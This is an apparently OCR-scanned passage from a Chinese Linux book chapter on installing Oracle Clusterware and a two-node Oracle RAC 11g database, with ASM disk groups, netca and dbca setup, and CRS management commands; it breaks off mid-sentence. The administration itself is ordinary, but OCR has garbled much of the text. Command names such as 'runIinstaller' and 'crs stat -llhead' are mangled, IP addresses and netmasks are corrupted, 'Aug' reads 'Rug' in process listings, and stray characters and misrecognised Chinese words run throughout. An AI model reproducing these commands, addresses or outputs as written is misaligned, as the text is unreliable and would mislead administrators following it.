Crw-rw---- 1 oracle oinstall 162, 9 Aug 27 00:13 /dev/raw/raw9 


从 输出 可 以 看 出 ，raw 设备 已 经 生成 ， 并 且 相 关 权 限 也 已 自动 加 载 。 
注意 : ASM 能 自动 生成 原始 设备 并 把 管理 权 交 给 ASM， 这 样 管理 ASM 就 非常 简单 了 。 


4.2.11 安装 Oracle Clusterware 


1. 解压 软件 包 
这 里 假定 数据 库 的 所 有 软件 放 在 /rac 目录 下 , 首先 需要 解压 Oracle 的 两 个 软件 包 , 操作 如 下 : 


[root@node-racl rac]#1ls 
linux 11gR1 database 1013.zip linux x86 1lgR1 clusterware.zip 
[root@node-racl rac]#unzip linux x86 1lgR1 clusterware.zip 
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[root@node-racl rac]#unzip linux 11gR1 database 1013.zip 


2. 安装 补丁 包 
解压 完成 ， 安 装 补丁 包 : 


[root@node-racl rac]#/rac/clusterware/rpm 
[root@node-racl rac]#rpm -Uvh cvuqdisk-1.0.1-1.rpm 


我 们 需要 在 两 个 节点 中 都 安装 补丁 包 ， 先 在 节点 node-racl 安装 完成 后 ， 继 续 在 node-rac2 
进行 安装 。 

3. 验证 安装 环境 

在 开始 安装 之 前 ,可 以 使 用 Oracle 自 带 的 一 个 检测 脚本 验证 系统 环境 是 否 可 以 进行 安装 ， 
以 oracle 身份 登录 系统 ， 执 行 如 下 命令 : 


[oracle@node-racl ~]$/rac/clusterware/runcluvfy.sh stage -pre crsinst -n 
node-racl,node-rac2 -verbose 


4. 开始 安装 


以 oracle 用 户 身份 登录 Linux 图 形 界面 , 而 不 是 以 root 用 户 身份 登录 , 再 用 su - oracle 
登录 ， 那 样 会 出 现 问题 ， 最 后 我 们 执行 安装 脚本 : 


[oracle@node-racl ~]$ cd /rac/clusterware/ 
[oracle@node-racl clusterware]$ ./runIinstaller 


加 接着 就 会 弹出 图 形 安装 向 导 界 面 ， 如 图 4.5 所 示 ， 出 现 这 个 界面 说 明 上 面 的 工作 已 完 
成 ， 可 以 顺利 往 下 进行 安装 了 。 
TH 
Specify Inventory directory and credentials 


You are 


[pv ee 


4.5 安装 向 导 界 面 
安装 过 程 中 ，/app/oralnventory 目录 下 会 生成 一 些 日 志 ， 以 便 日 后 查看 ，oinstall 表示 安装 组 。 


接 下 来 到 下 一 步 ， 如 图 4.6 所 示 ，Name: 名 称 后 面 的 内 容 可 以 修改 ，Path 指定 了 主 程 
序 的 目录 ， 如 果 环境 变量 设置 正常 ， 会 显示 如 图 4.6 所 示 的 内 容 。 
EI 
Specify Home Details 


图 4.6 环境 变量 设置 
这 一 步 会 检测 到 两 个 节点 的 存在 , 这 是 在 /etc/hosts 做 好 了 解析 的 结果 , 如 图 4.7 所 示 。 
Specify Cluster Configuration 


图 4.7 检测 到 存在 的 节点 


这 一 步 需要 修改 接口 类 型 ，ethl 应 该 是 Public (公有 接口 ) ， 单 击 “Edit”， 会 弹出 
“Edit private interconnect type” 对 话 框 ， 这 时 选择 “Public” 并 确定 ， 如 图 4.8 和 图 4.9 所 示 。 


192.168.12.0 
10000 


图 4.8 接口 类 型 图 4.9 修改 接口 类 型 


下 面 进入 关于 OCR 安装 位 置 的 设置 界面 ， 这 里 我 们 选择 普通 匈 余 策略 ， 扩 展 宛 余 策 
略 很 少 使 用 。rawl 就 是 给 OCR 预 留 的 设备 ， 如 图 4.10 所 示 。 
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4.10 关于 OCR 安装 位 置 的 设置 界面 


接 下 来 是 Voting Disk 位 置 的 设 定 ,我们 还 是 选择 普通 宛 余 策略 ， 由 于 这 个 非常 重要 ， 
所 以 设置 了 两 个 镜像 raw4 和 raw5， 如 图 4.11 所 示 。 


图 4.11 Voting Disk 位 置 的 设 定 


到 这 里 就 进入 安装 复制 文件 阶段 ， 大 概 维持 15~20 分 钟 ， 如 图 4.12 和 图 4.13 所 示 ， 
安装 完毕 之 后 ， 会 弹出 如 图 4.14 所 示 的 界面 。 


Global Settings 
‘Source: /rac/clusterware/stage/products. xml 
Oracle Home': /app/oracrs/product/11.0.6/crs (OraCrs119.home) 
Cluster Nodes 
Installation Type: Complete 
Product Languages 
LEnglish 
pace Requirements 
/ Required 649MB (includes 47MB tamporary) : Available 8.94CB 
Remote Nodes 
New Installations G6 products) 


4.12 ”安装 文件 
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Installing Oracle Clusterware 1110.6.0 


Ideal Platform for 
Grid Computing 


Low cost servers 
and storage 


Highest availebility 


Be bility 


[GE 


图 4.13 复制 文件 


- Execute Configuration scripts x 


le Configuration scripts need t0 be executed as the “roor" user in each cluster 
node, 


Scripts to be executed: 


Number Script Location Nodes 

1 /app/oralnventory/orainsiRoot. sh node-rac l,node-rac2 

2 /app/oracre/product/11.0.6/crs/root sh |node-racl,node-rac2 

村 mM 


To execute the configuration scripts: 
1. Open a terminal window 
2, Log in as “roor” 
3. Run the scripts in each cluster node 
4. Return to this window and click "OK to continue 


Re 
| | 
四 成 功 安装 之 后 ， 系 统 会 要 求 在 两 个 节点 ， 分 别 用 root 登录 执行 以 下 操作 : 


/app/orainventory/orainstRoot.sh 


/app/oracrs/product/11.06/crs/root.sh 


根据 安装 向 导 提 示 ， 以 root 用 户 身份 在 所 有 节点 上 分 别 执行 上 述 两 个 脚本 ， 
节点 一 个 节点 地 执行 ， 在 node-racl 中 执行 root.sh 时 的 信息 如 下 : 


[root@node-racl crs]# ./root.sh 

WARNING: directory '/app/oracrs/product/11.0.6' is not owned by root 
WARNING: directory '/app/oracrs/product' is not owned by root 
/etc/oracle does not exist. Creating it now. 

node 1: node-racl node-privl node-racl 

node 2: node-rac2 node-priv2 node-rac2 


Creating OCR keys for user 'root', privgrp 'root'.. 
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Operation successful. 
Now formatting voting device: /dev/raw/raw3 // 对 三 个 磁盘 格式 化 
Now formatting voting device: /dev/raw/raw4 
Now formatting voting device: /dev/raw/raw5 
Format of 3 voting devices complete. 
Startup will be queued to init within 30 seconds. 
Adding daemons to inittab // 在 initab 里 增加 了 启动 信息 
Expecting the CRS daemons to be up within 600 seconds. 


Cluster Synchronization Services is active on these nodes. 


//active 表示 已 激活 node-racl 
Cluster Synchronization Services is inactive on these nodes. 
//inactive 表示 未 激活 node-rac2 


Local node checking complete. Run root.sh on remaining nodes to start CRS 


daemons. 
继续 在 node-rac2 中 执行 root.sh 脚本 ， 输 出 如 下 : 


[root@node-rac2 crs]# ./root.sh 
WARNING: directory '/app/oracrs/product/11.0.6' is not owned by root 
WARNING: directory '/app/oracrs/product' is not owned by root 
WARNING: directory '/app/oracrs' is not owned by root 
WARNING: directory '/app' is not owned by root 
Checking to see if Oracle CRS stack is already configured 
/etc/oracle does not exist. Creating it now. 
node 1: node-racl node-privl node-racl 
node 2: node-rac2 node-priv2 node-rac2 
clscfg: Arguments check out successfully. 
Cluster Synchronization Services is active on these nodes. // 两 个 节点 均 已 激活 
node-racl 
node-rac2 
Cluster Synchronization Services is active on all the nodes. 
Running vipca(silent) for configuring nodeapps 
Creating VIP application resource on (2) nodes ... 
Creating GSD application resource on (2) nodes ... 
Creating ONS application resource on (2) nodes ... 
Starting VIP application resource on (2) nodes ... 
Starting GSD application resource on (2) nodes... 
Starting ONS application resource on (2) nodes ... 
Done. 


两 个 节点 激活 后 ， 在 两 个 节点 上 启动 VIP、GSD、ONS 资源 ， 所 有 资源 都 启动 完毕 
后 就 表示 Oracle Clusterware 已 安装 完成 ， 如 图 4.15 所 示 。 
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图 4.15 安装 完成 


4.2.12 ”安装 Oracle 数据 库 


在 Oracle Clusterware 安装 成 功 后 ， 开 始 进行 Oracle 数据 库 的 安装 ， 以 oracle 用 户 身份 登 
录 到 任意 一 个 集群 节点 ， 执 行 如 下 命令 开始 安装 : 


[oracle@node-rac2 rac]$ /rac/database/runIinstaller 


接着 就 会 弹出 图 形 安装 向 导 界面 ， 单 击 进 入 下 一 步 操作 。 如 图 4.16 所 示 是 安装 路 径 的 选择 。 


JuD1 /Joracle 


OraDbl1g-homel 日 
/uO1/oracle/product/11.0.6/rac.db 品 


图 4.16 安装 路 径 的 选择 
选择 集群 安装 ， 需 要 选中 node-rac2， 并 进入 下 一 步 操作 ， 如 图 4.17 所 示 系 统 会 进行 安装 


检测 。 


图 4.17 选择 安装 类 型 
继续 进行 下 一 步 操 作 ， 会 出 现 如 下 三 个 选项 : 


® Creata Data Base 


和 
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@ Configure Automatic Storage Management ( 自动 存储 管理 ASM ) 
@ Install Software Only 


选择 第 三 项 安装 Oracle, 如 图 4.18 所 示 , 需要 指定 OSDBA 组 是 dba,OSOPER 组 是 oinstall， 
OSASM 组 是 oinstall， 这 是 前 面 都 指定 好 的 。 


图 4.18 指定 各 组 


这 个 步骤 根据 机 器 配置 情况 ,可 能 要 复制 到 远程 节点 ， 执 行 过 程 可 能 要 耗费 一 段 时 间 。 图 
4.19 显示 了 安装 的 进程 。 


Installing Oracle pana 


图 4.19 ”安装 进程 
所 有 安装 完成 之 后 ,我们 用 root 身份 执行 /u01/oracle/product/11.0.6/rac_db/root.sh， 同 样 还 
是 在 两 个 节点 分 别 执行 ,这 里 有 个 先后 顺序 的 问题 ， 先 在 节点 1 执行 完成 后 ， 再 在 节点 2 上 执 
行 ， 不 要 同时 在 两 个 节点 执行 ， 否 则 会 报错 ， 如 图 4.20 所 示 。 执 行 完成 后 ， 单 击 “OK ”按钮 。 


四 Execute Contiguration scripts x 


The following configuration scripts need to be executed as the "roor" user in each cluster 
node. 


Scripts to be executed: 
Number Script Location 


1 ju0ljoraclejproducUy11.0.6jrac-db/jrooLsh Node-rac2,node-racl 


al ml 


To execute the configuration scripts: 
1. Open a terminal window 
2. Log in as “roor’ 
3. Run the scripts in each cluster node 
4. Return to this window and click "OK to continue 


ep | 于 = 


图 4.20 执行 配置 脚本 


4.2.13 配置 Oracle Net 


以 Oracle 用 户 身份 登录 到 集群 任意 节点 的 图 形 界 面 ， 我 们 还 是 先 登 录 节 点 1， 然 后 执行 
netca 命令 ， 配 置 Oracle Net。 选 择 Cluster configuration 集群 配置 并 单 击 “Next” 按 钮 ， 如 图 
4.21 所 示 。 


图 4.21 选择 集群 配置 


可 以 看 到 如 图 4.22 所 示 的 整个 集群 中 可 以 识别 的 所 有 节点 ， 选 择 Select all nodes， 并 单 击 
“Next” 按 钮 。 


图 4.22 可 以 识别 的 节点 
我 们 选择 默认 的 监听 的 配置 选项 ， 如 图 4.23 所 示 。 


4.23 选择 监听 配置 选项 


.154 。 


监听 名 称 选 择 默 认 的 LISTENER， 监 听 可 用 协议 选择 TCP， 如 图 4.24 所 示 ， 端 口 使 用 默 
认 的 1521 端口 。 在 如 图 4.25 所 示 的 选择 监听 方法 中 ， 选 择 Local Naming。 


4.24 监听 选项 


4.25 选择 监听 方法 


4.2.14 创建 RAC 数据 库 


以 Oracle 用 户 身 份 登录 到 集群 任意 节点 的 图 形 界面 ,然后 执行 dbca 命令 ,选择 Oracle Real 
Application Clusters database 单 选 按钮 ， 如 图 4.26 所 示 。 


图 4.26 集群 节点 图 形 界面 
下 面 让 选择 可 操作 平台 ， 因 为 还 没有 配置 存储 信息 ， 所 以 先 选 第 三 项 配置 ASM 存储 ， 如 


4.27 所 示 。 单 击 “Select All ”按钮 以 选择 节点 node-rac1、 节 点 node-rac2。 


图 4.27 选择 可 操作 平台 


在 图 4.28 所 示 的 对 话 框 中 输入 ASM 实例 密码 。 接 着 弹出 DBCA 对 话 框 提示 将 创建 ASM 
实例 ， 单 击 “OK” 按 钮 ， 如 图 4.29 所 示 。 


图 4.29 DBCA 对 话 框 
创建 过 程 根据 机 器 配置 情况 ， 将 花费 一 段 时 间 ， 如 图 4.30 所 示 。 


4.30 创建 ASM 实例 
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当 ASM 实例 创建 完成 后 ， 默 认 进 入 如 图 4.31 所 示 的 界面 。 


Using the ASM Disk Croups page you can view and manage existing disk groups. You Can 
choose to create a new disk group or add disks to an existing disk group. All operations will 
be performed on the set of nodes selected in the prewous Page 

~ Arallable Disk Croups 


Seler Disk Croup Name SizeMB) Free MB) Redundancy Siale | 


Nore Free QI renect me usable free space avataple tahung regundancy nto actount 
Create New| Ad Disks] Manaye 25M Templares] Mourr]| Mouns sg) 


图 4.31 配置 磁盘 组 对 话 框 


这 个 界面 就 是 用 来 配置 ASM 磁盘 组 的 ， 单 击 按钮 “Create New” 按 钮 ， 出 现 如 图 4.32 所 
示 的 提示 框 。 
Pr | 


一 Reaundancy 
OHon Darmal Enomal 


一 Select Member Disks 
Show Candidates OShow 人 


| | O Jowsk pan [Header Satus ASM Name Size (ME) 
Provisioned 9766 
sl ne 
oned 
r ‘slor 
RSM 本 


EEC 
图 4.32 新建 磁 盘 组 


从 图 4.32 中 可 以 看 出 ， 这 些 原始 文件 都 是 前 期 创建 好 的 ， 上 面 的 磁盘 组 名 称 指定 为 
FLASH DISK， 这 里 需要 注意 元 余 策 略 选项 (Redundancy) ， 选 择 External 不 提供 元 余 策 略 ， 
之 后 我 们 选择 一 块 镜像 磁盘 分 区 /dev/raw/raw6。 如 果 选 择 Normal 则 至 少 选 择 两 块 磁盘 ， 若 选 
择 高 宛 余 (High) 则 至 少 需要 选择 三 块 磁盘 。 这 里 可 以 根据 自己 工作 的 需求 自行 选择 。 根 据 这 
种 方式 我 们 连续 创建 了 多 个 磁盘 组 。 

如 图 4.33 所 示 ， 我 们 创建 了 4 个 磁盘 组 ， 分 别 是 关于 归档 日 志 的 ARCH DISK1、 
ARCH DISK2， 关 于 数据 的 DATA_DISK、FLASH DISK。 阅 读 到 这 里 大 家 可 能 会 有 疑问 ， 宛 
余 策略 如 何 实现 ? ASM 并 不 提供 镜像 磁盘 ， 它 镜像 的 是 分 配 单元 ， 因 此 当 某 个 磁盘 组 发 生 故 
障 时 ，ASM 将 从 这 些 磁 盘 组 中 的 其 他 正常 磁盘 中 去 读 取 镜 像 内 容 ， 然 后 自动 重建 故障 磁盘 的 
内 容 ， 这 样 就 将 故障 磁盘 的 IO 分 配 到 其 他 磁盘 上 ， 通 过 这 样 的 方式 实现 元 余 的 功能 。 


Linux “企业 应 用 案例 精 解 


图 4.33 ”磁盘 组 列表 


介绍 完了 基本 原理 ， 继 续 下 一 步 操作 。 这 里 出 现 了 图 4.34 所 示 的 界面 ， 我 们 选择 “Use 
Oracle-Managed Files” 单 选 按钮 ， 指 定数 据 文件 的 路 径 ， 把 所 有 数据 放 在 DATA_DISK 磁盘 
组 中 ， 作 为 磁盘 组 需要 在 RAC 中 用 “+” 号 表示 。 


图 4.34 指定 路 径 


4.35 中 指定 了 Oracle 的 闪 回 存储 区 , 放 在 了 FLASH _DISK 磁盘 组 ,下面 的 行 指定 了 大 
小 为 2GB, 还 需要 选中 自动 归档 选项 “Automatic Archiving”，ARCH DISK1 和 ARCH DISK2 
是 互 为 镜像 的 ， 从 而 保证 了 数据 安全 。 


图 4.35 闪 回 存储 区 的 设 定 


在 如 图 4.36 所 示 的 界面 中 选择 关于 字符 集 的 策略 ， 一 旦 选择 就 不 能 修改 ， 所 以 要 慎重 选 
择 。 为 了 满足 所 有 字符 请 求 ， 我 们 选择 Use Unicode (AL32UTF8) 单 选 按钮 ， 其 他 都 选择 默 
认 设 置 。 


* 158* 


图 4.36 选择 字符 集 策略 
如 图 4.37 所 示 ， 选 中 “Create Database” 复 选 框 ， 单 击 “Next” 按 钮 。 


图 4.37 创建 基础 数据 
到 这 里 为 止 ， 数 据 库 就 开始 创建 了 ， 分 为 以 下 4 个 步骤 ; 


四 开始 复制 database 文件 。 

在 所 有 节点 创建 ， 启 动 Oracle 实例 。 
创建 集群 数据 库 的 请 求 。 

完成 数据 库 创建 。 


图 4.38 显示 了 安装 的 进度 ， 根 据 机 器 配置 情况 ， 需 要 适当 等 待 一 段 时 间 ， 就 会 弹出 如 图 
4.39 所 示 的 安装 成 功 的 对 话 框 。 


图 4.38 安装 进程 图 4.39 ”安装 成 功 
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到 这 里 为 止 RAC 数据 库 在 集群 所 有 节点 都 安装 成 功 ， 我 们 登录 到 具体 节点 中 看 看 
相关 服务 的 状态 ， 如 登录 到 node-racl 节点 : 因为 我 们 在 RAC 节点 ， 它 的 实例 名 称 叫 
“+ASM1”: 


[root@node-racl~] $ps -ef 


oracle 6138 1 0 Rug 10 ? 00:00:08 asm pmon +ASM1 
oracle 6140 二 0 Rug 10 ? 00:00:11 asm vktm +ASM1 
oracle 6144 时 0 Rug 10 ? 00:00:04 asm diag +ASM1 
oracle 6146 1 0 Rug 10 ? 00:00:44 asm ping +ASM1 
oracle 6148 1 0 Rug 10 ? 00:00:00 asm psp0_+ASM1 
oracle 6152 1 0 Rug 10 ? 00:01:44 asm dia0 +RSM1 
oracle 6154 0 Rug 10 ? 00:01:15 asm lmon +RSM1 
oracle 6156 2 0 Rug 10 ? 00:05:50 asm lmd0_ +RSM1 
oracle 6158 四 0 Rug 10 ? 00:06:30 asm lms0_+RSM1 
oracle 6162 和 0 Rug 10 ? 00:00:01 asm mman +RSM1 
oracle 6169 由 0 Rug 10 ? 00:00:02 asm dbw0_+RSM1 
Oracle 6171 st 0 Rug 10 ? 00:00:02 asm_1gwI_+RSM1 
Oracle 6173 到 0 Rug 10 ? 00:00:01 asm_ckpt_+RSM1 
oracle 6175 上 0 Rug 10 ? 00:00:01 asm smon +RSM1 
oracle 6177 是 0 Rug 10 ? 00:07:55 asm_rbal_+RSM1 
oracle 6179 I 0 Rug 10 ? 00:00:02 asm gmon +RSM1 
同样 我 们 登录 到 node-rac2 节点 : 

[oracle@node-rac2~] $ps -ef 

oracle 10480 到 0 Rug 10 ? 00:01:08 asm pmon +RSM2 
oracle 10482 7 0 Rug 10 ? 00:01:03 asm vktm +ASM2 
oracle 10486 时 0 Rug 10 ? 00:00:08 asm diag +ASM2 
oracle 10489 EL 0Aug103 00:00:44 asm ping +ASM2 
oracle 10491 a 0 Rug 10 ? 00:00:03 asm psp0_+ASM2 
oracle 10495 0 Rug 10 ? 00:03:22 asm dia0 +RSM2 
oracle 10497 出 0 Rug 10 3? 00:01:06 asm lmon +RSM2 
oracle 10499 4 0Aug103 00:06:37 asm lmd0_+ASM2 
oracle 10501 a 0Aug103 00:08:11 asm lms0_+ASM2 
oracle 10510 中 0 Rug 10 ? 00:00:03 asm mman +ASM2 
oracle 10512 中 0 Rug 10 ? 00:00:02 asm_dbw0_+RSM2 
oracle 10514 0 Rug 10 ? 00:00:03 asm lgwr_ +ASM2 
oracle 10516 a 0 Rug 10 ? 00:00:05 asm ckpt +ASM2 
oracle 10518 0Aug 10 ? 00:00:02 asm smon +ASM2 
oracle 10520 下 0 Rug 10 ? 00:09:32 asm rbal +ASM2 
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oracle 10522 0 Rug 10 ? 00:00:37 asm gmon +RSM2 


我 们 从 进程 可 以 看 到 ASM 实例 ， 还 能 查看 到 数据 库 实例 ， 在 节点 1 中 能 看 到 如 下 


信息 : 
oracle 6520 1 0 Rug 10 ? 00:00:24 ora pmon racdbl 
oracle 6522 0 Rug 10 ? 00:00:10 ora vktm racdbl 
oracle 6526 二 0 Rug 10 ? 00:00:04 ora diag racdbl 
oracle 6528 1 0 Rug 10 ? 00:00:01 ora dbrm racdbl 
oracle 6530 1 0 Rug 10 ? 00:00:45 ora ping racdbl 
oracle 6532 2 0 Rug 103 00:00:05 ora psp0 racdbl 
oracle 6539 0 Rug 10 ? 00:00:00 ora acms racdbl 
oracle 6543 本 0 Rug 10 ? 00:03:36 ora dia0 racdbl 
oracle 6545 1 0 Rug 10 ? 00:01:31 ora lmon racdbl 
oracle 6547 1 0 Rug 10 ? 00:02:48 ora lmd0_racdbl 
oracle 6549 于 0 Rug 10 ? 00:00:39 ora lms0_racdbl 
oracle 6553 0 Rug 10 ? 00:00:01 ora rms0_racdbl 
oracle 6555 st 0 Rug 10 ? 00:00:01 ora mman racdbl 
oracle 6557 由 0 Rug 10 ? 00:00:07 ora dbw0_racdbl 
oracle 6559 1 0 Rug 10 ? 00:00:06 ora lgwr racdbl 
oracle 6561 和 0 Rug 10 ? 00:00:32 ora ckpt_racdbl 
oracle 6563 0 Rug 10 ? 00:00:26 ora_smon_ racdbl 
oracle 6566 和 0 Rug 10 ? 00:00:00 ora_reco_racdbl 
Oracle 6569 0 Rug 10 ? 00:00:04 ora rbal racdbl 
oracle 6571 和 0 Rug 10 ? 00:02:02 ora_asmb racdbl 
Oracle 6578 下 0 Rug 10 ? 00:00:38 ora mmon_ racdbl 
oracle 6580 a 0Aug 10 ? 00:00:15 
oraclet+ASM] asmb racdbl (DESCRIPTION= (LOCAL=YES) (ADDRESS= (PROTOCOL=beq))) 

oracle 6582 3 0 Rug 10 ? 00:00:24 ora mmnl racdbl 
oracle 6584 和 : 0Aug103 00:00:00 ora qd000_racdbl 
oracle 6586 a 0 Rug 10 ? 00:00:00 ora_s000_racdbl 
Oracle 6601 可 0 Rug 10 ? 00:04:14 ora lck0 racdbl 
oracle 6603 1 0 Rug 10 ? 00:00:01 ora rsmn racdbl 
oracle 6651 4 0Aug103 00:03:48 ora pz99 racdbl 
oracle 6745 2 0Aug103 00:00:05 ora arc0 racdbl 
oracle 6747 和 0 Rug 10 ? 00:00:05 ora arcl racdbl 
oracle 6749 于 0 Rug 10 ? 00:00:10 ora arc2 racdbl 
oracle 6751 于 0 Rug 10 ? 00:00:05 ora arc3 racdbl 
oracle 让 中 下 二 二 0 Rug 10 3? 00:00:01 ora smco racdbl 
oracle 6804 1 0Aug103 00:00:00 ora fbda racdbl 
oracle 6806 x 0Aug 10 ? 00:00:01 ora_gtx0 racdbl 
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oracle 6808 a 0Aug103 00:00:00 ora rcbg racdbl 
oracle 6831 1 0 Rug 10 ? 00:00:01 ora qmnc racdbl 
oracle 6939 1 0 Rug 10 ? 00:00:00 ora q000 racdbl 
oracle 6946 1 0Aug103 00:00:01 ora q002 racdbl 


例 racdbl 和 普通 的 单机 数据 库 实例 相 比 ， 本 例 增加 了 很 多 后 台 进 程 。 在 另外 一 
个 node-rac2 上 也 能 看 到 相应 的 进程 状态 。 下 面 我 们 看 看 node-racl 上 的 网 卡 IP 配置 
情况 : 


[root@node-racl ~]# ifconfig 

eth0 Link encap:Ethernet Hwaddr 00:0C:29:AD:55:5D 
inet addr:192.1698-.12.231 Beast=192-:169=12.255 Mask:255.255.255.0 
inet6 addr: fe80::20c:29ff:fead:555d/64 Scope:Link 
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 
RX packets:26044364 errors:0 dropped:0 overruns:0 frame:0 
TX packets:25163257 errors:0 dropped:0 overruns:0 carrier:0 
collisions:0 txqueuelen:1000 
RX bytes:3181557839 (2.9 GiB) TX bytes:3949978575 (3.6 GiB) 
Interrupt:59 Base address:0x2000 


eth0:1 Link encap:Ethernet Hwaddr 00:0C:29:AD:55:5D 
inet addr:192s168=12-230 Bcast:192.168:12.255 Mask:255=255:255=0 
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 
Interrupt:59 Base address:0x2000 

ethl Link encap:Ethernet Hwaddr 00:0C:29:AD:55:67 
inet addr=:10:10=10=:1 Bcast:10-255.255-.255 Mask:255-0.0.0 
inet6 addr: fe80::20c:29ff:fead:5567/64 Scope:Link 
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 
RX packets:14764034 errors:0 dropped:0 overruns:0 frame:0 
TX packets:13455201 errors:0 dropped:0 overruns:0 carrier:0 
collisions:0 txqueuelen:1000 
RX bytes:786194930 (749.7 MiB) TX bytes:3736316881 (3.4 GiB) 
Interrupt:67 Base address:0x2080 


从 输出 可 以 看 出 ，eth0: 192.168.12.231 是 公有 卫 ， 它 的 漂移 地 址 为 192.168.12.230， 连 接 
心跳 线 的 私 网 地 址 是 10.10.10.1。 

同样 我 们 登录 到 节点 node-rac2 ，eth0 的 对 应 地 址 为 192.168.12.232， 漂 移 地 址 为 
192.168.12.240， 连 接 心跳 线 的 私 网 地 址 是 10.10.10.2。 
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4.2.15 _ Oracle CRS 的 管理 与 维护 


CRS 提供 了 很 多 命令 用 于 管理 和 查看 集群 服务 状态 , 常用 的 有 crs_stat、 crs_start\ crs_stop、 
crsetl 等 。 掌 握 这 些 命令 对 于 维护 集群 非常 有 帮助 。 


1. 查看 集群 状态 


通过 crs_stat 命令 可 以 查看 集群 中 所 有 资源 的 状态 ， 包 括 资源 状态 、 资 源 运 行 在 哪个 节点 
上 、 资 源 类 型 等 信息 。 例 如 : 


[oracle@node-racl ~]$ crs stat -t 

Name Type Target State Host 
ora....SMl1.asm application ONLINE ONLINE node-racl 
.Cl.lsnr application ONLINE ONLINE node-racl 
-acl.gsd application ONLINE ONLINE node-racl 


ora 


ora 
ora....acl.ons application ONLINE ONLINE node-racl 
ora....acl.vip application ONLINE ONLINE node-racl 
ora....SM2.asm application ONLINE ONLINE node-rac2 
ora....C2.1snz application ONLINE ONLINE node-rac2 
ora....ac2.gsd application ONLINE ONLINE node-rac2 
ora....ac2.ons application ONLINE ONLINE node-rac2 
ora....ac2.vip application ONLINE ONLINE node-rac2 
ora.racdb.db application ONLINE ONLINE node-rac2 
ora....bl.inst application ONLINE ONLINE node-racl 
ora....b2.inst application ONLINE ONLINE node-rac2 
ora....test.cs application ONLINE ONLINE node-rac2 
ora....dbl.srv application ONLINE ONLINE node-racl 
ora....db2.srv application ONLINE ONLINE node-rac2 


如 果 想 更 详细 地 了 解 每 个 资源 的 名 称 及 状态 ， 还 可 以 使 用 “crs_stat -1” 命 令 ， 例 如 : 


[oracle@node-rac2 ~]$crs stat -llhead -n 15 
NAME=ora.node-racl .ASM]1 .asm 
TYPE=application 

TARGET=ONLINE 

STATE=ONLINE on node-racl 
NAME=ora.node-racl .LISTENER NODE-RAC]1.1snr 
TYPE=application 

TARGET=ONLINE 

STATE=ONLINE on node-racl 
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NAME=ora.node-racl.gsd 
TYPE=application 
TARGET=ONLINE 
STATE=ONLINE on node-racl 


可 以 看 到 ， 这 个 输出 中 包含 了 每 个 服务 完整 的 名 称 和 运行 状态 。 通 过 了 解 节点 运行 状态 ， 
有 助 于 对 RAC 集群 的 管理 和 维护 。 

还 可 以 使 用 crs_stat -p <resource name> 来 查看 资源 的 属性 情况 ， 包 括 依 赖 关 系 等 ， 
例如 : 


[oracle@node-racl ~]$crs stat -p ora.node-rac2.LISTENER NODE-RAC2.1snr 


2. 启动 与 关闭 集群 服务 资源 crs_stop 与 crs_start 命令 
通过 crs_stop 可 以 方便 地 关闭 某 个 服务 资源 ， 例 如 : 


[oracle@node-racl admin]$ crs_ stop ora.node-racl.LISTENER NODE-RAC]1.1lsnr 

Attempting to stop "ora.node-Iacl.LISTENER_NODE-RRC1.1snr'" on member 
'node-racl' 

Stop of 'ora.node-racl.LISTENER NODE-RAC1.1lsnr' on member 'node-racl' 


succeeded. 
此 时 ， 查 看 node-racl 节点 的 LISTENER 服务 状态 : 


[oracleenode-racl ~]$ crs stat -tlgrep lsnr 
ora....Cl.lsnr application OFFLINE OFFLINE 
Ora....C2.1lsnr application ONLINE ONLINE node-rac2 


从 输出 可 知 ，node-racl 节点 的 LISTENER 服务 已 经 处 于 OFFLINE 状态 了 。 
接着 启动 node-racl 节点 的 LISTENER 服务 : 


[oracle@node-racl ~]$crs start ora.node-racl.LISTENER NODE-RAC]1.1lsnr 

Attempting to start 'ora.node-racl.LISTENER NODE-RRC1.1snr' on member 
"node-racl" 

Start of ‘ora.node-racl.LISTENER NODE-RAC1.lsnr' on member 'node-racl' 


succeeded. 
其 实 RAC 数据 库 的 监听 还 可 以 通过 如 下 方式 启动 和 关闭 : 


[oracle@node-racl ~]$lsnrctl start LISTENER NODE-RAC1 
[oracle@node-racl ~]$lsnrctl stop LISTENER NODE-RAC1 


有 时 候 ， 可 能 需要 将 集群 资源 全 部 关闭 ， 可 以 通过 如 下 命令 完成 : 
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[oracleenode-racl ~]$ crs stop -all 

[oracle@node-racl ~]$ crs stat -tt 

Name Type Target State Host 
ora....SM]1.asm application OFFLINE ONLINE node-racl 
ora... .Cl1.1lsnr application OFFLINE ONLINE node-racl 
ora....acl.gsd application OFFLINE ONLINE node-racl 
ora....acl.ons application OFFLINE ONLINE node-racl 
ora....acl.vip application OFFLINE ONLINE node-racl 
ora....SM2.asm application OFFLINE ONLINE node-rac2 
ora....C2.1snr application OFFLINE ONLINE node-rac2 
ora....ac2.gsd application OFFLINE ONLINE node-rac2 
ora....ac2.0ns application OFFLINE ONLINE node-rac2 
Ora....ac2.Vvip application OFFLINE ONLINE node-rac2 
ora.racdb.db application OFFLINE ONLINE node-rac2 
orae -blinst application OFFLINE ONLINE node-racl 
Ora....b2.inst application OFFLINE ONLINE node-rac2 
Ora....test.cs application OFFLINE ONLINE node-rac2 
ora....dbl.srv application OFFLINE ONLINE node-racl 
ora....db2.srv application OFFLINE ONLINE node-rac2 


也 可 以 通过 一 个 命令 将 集群 所 有 资源 全 部 启动 ， 操 作 如 下 : 
[oracle@node-rac2 ~]$ crs start -all 


3. 启动 与 关闭 CRS 


在 RAC 数据 库 中 ，CRS 接管 了 数据 库 的 启动 和 关闭 等 操作 ， 集 群 节点 的 实例 随 着 CRS 
服务 的 启动 而 自动 启动 ， 但 是 CRS 也 可 以 进行 手工 启动 和 关闭 。 
管理 CRS 服务 的 命令 如 下 : 


[root@node-racl ~]# /etc/init.d/init.crs {stoplstartlenableldisable} 
例如 ， 要 关闭 某 个 节点 的 CRS 服务 ， 可 以 执行 如 下 操作 : 


[root@node-racl ~]# /etc/init.d/init.crs stop 
Shutting down Oracle Cluster Ready Services (CRS): 
Sep 18 11:17:1.86 | INF | daemon shutting down 
Stopping resources. 

This could take several minutes. 

Successfully stopped Oracle Clusterware resources 


Stopping Cluster Synchronization Services. 
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Shutting down the Cluster Synchronization Services daemon. 
Shutdown request successfully issued. 


Shutdown has begun. The daemons should exit soon. 


CRS 服务 关闭 后 , 与 此 节点 相关 的 集群 实例 也 将 随 之 停止 , 同时 此 节点 的 vip 地 址 也 将 转 
